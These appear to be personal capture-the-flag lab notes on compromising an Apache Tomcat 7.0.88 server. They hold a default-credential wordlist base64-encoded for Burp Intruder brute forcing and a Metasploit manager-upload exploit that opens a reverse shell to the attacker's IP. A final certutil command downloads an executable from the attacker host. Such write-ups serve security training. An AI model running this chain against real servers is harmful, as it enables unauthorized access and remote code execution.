# Meta Data

IP: 10.129.187.233

Date Accessed: 08/12/2021



# Enum

```
Microsoft Windows 2012|7|2008|2016|Vista 

8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

```

- default webpage > server header exposed 
https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

# Burp Suite

```
GET /host-manager/html HTTP/1.1
Host: 10.129.187.233:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://10.129.187.233:8080/
Upgrade-Insecure-Requests: 1
Authorization: Basic dG9tY2F0OnRvbWNhdA==

```

- Decoded with base64

```
Authorization: Basic tomcat:tomcat


```

# Set up default password 

- set up default password for tomcat and encode to base64

```
admin:password
admin: 
admin:Password1
admin:password1
admin:admin
admin:tomcat
both:tomcat
manager:manager
role1:role1
role1:tomcat
role:changethis
root:Password1
root:changethis
root:password
root:password1
root:r00t
root:root
root:toor
tomcat:tomcat
tomcat:s3cret
tomcat:password1
tomcat:password
tomcat:
tomcat:admin
tomcat:changethis

```

>> for cred in $(cat tomcat.txt); do echo -n $cred | base64; done


```
YWRtaW46cGFzc3dvcmQ=
YWRtaW46
YWRtaW46UGFzc3dvcmQx
YWRtaW46cGFzc3dvcmQx
YWRtaW46YWRtaW4=
YWRtaW46dG9tY2F0
Ym90aDp0b21jYXQ=
bWFuYWdlcjptYW5hZ2Vy
cm9sZTE6cm9sZTE=
cm9sZTE6dG9tY2F0
cm9sZTpjaGFuZ2V0aGlz
cm9vdDpQYXNzd29yZDE=
cm9vdDpjaGFuZ2V0aGlz
cm9vdDpwYXNzd29yZA==
cm9vdDpwYXNzd29yZDE=
cm9vdDpyMDB0
cm9vdDpyb290
cm9vdDp0b29y
dG9tY2F0OnRvbWNhdA==
dG9tY2F0OnMzY3JldA==
dG9tY2F0OnBhc3N3b3JkMQ==
dG9tY2F0OnBhc3N3b3Jk
dG9tY2F0Og==
dG9tY2F0OmFkbWlu
dG9tY2F0OmNoYW5nZXRoaXM=


```

- paste the payload to burpsuite intruder
- payload encoding > uncheck the URL -endode


# Found crendetials 

`tomcat:s3cret` > logged in to manager application

OR

use tomcat manager exploit with metasploit 
```
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhost 10.129.187.233


```

```
[+] 10.129.187.233:8080 - Login Successful: tomcat:s3cret


```


# code execution
```
msf6 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp 
payload => java/shell_reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost 10.10.14.124
lhost => 10.10.14.124
msf6 exploit(multi/http/tomcat_mgr_upload) > set lport 4444
lport => 4444
msf6 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 10.10.14.124:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying ExZmDNsy3BbwOPPOtnbbl89valR7...
[*] Executing ExZmDNsy3BbwOPPOtnbbl89valR7...
[*] Undeploying ExZmDNsy3BbwOPPOtnbbl89valR7 ...
[*] Command shell session 1 opened (10.10.14.124:4444 -> 10.129.187.233:49192) at 2021-08-12 18:29:35 -0400

id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\apache-tomcat-7.0.88>


```

- go to admin.desktop to get flag


certutil -urlcache -f http://10.10.14.124/sh.exe c:\users\administrator\desktop\flags\sh.exe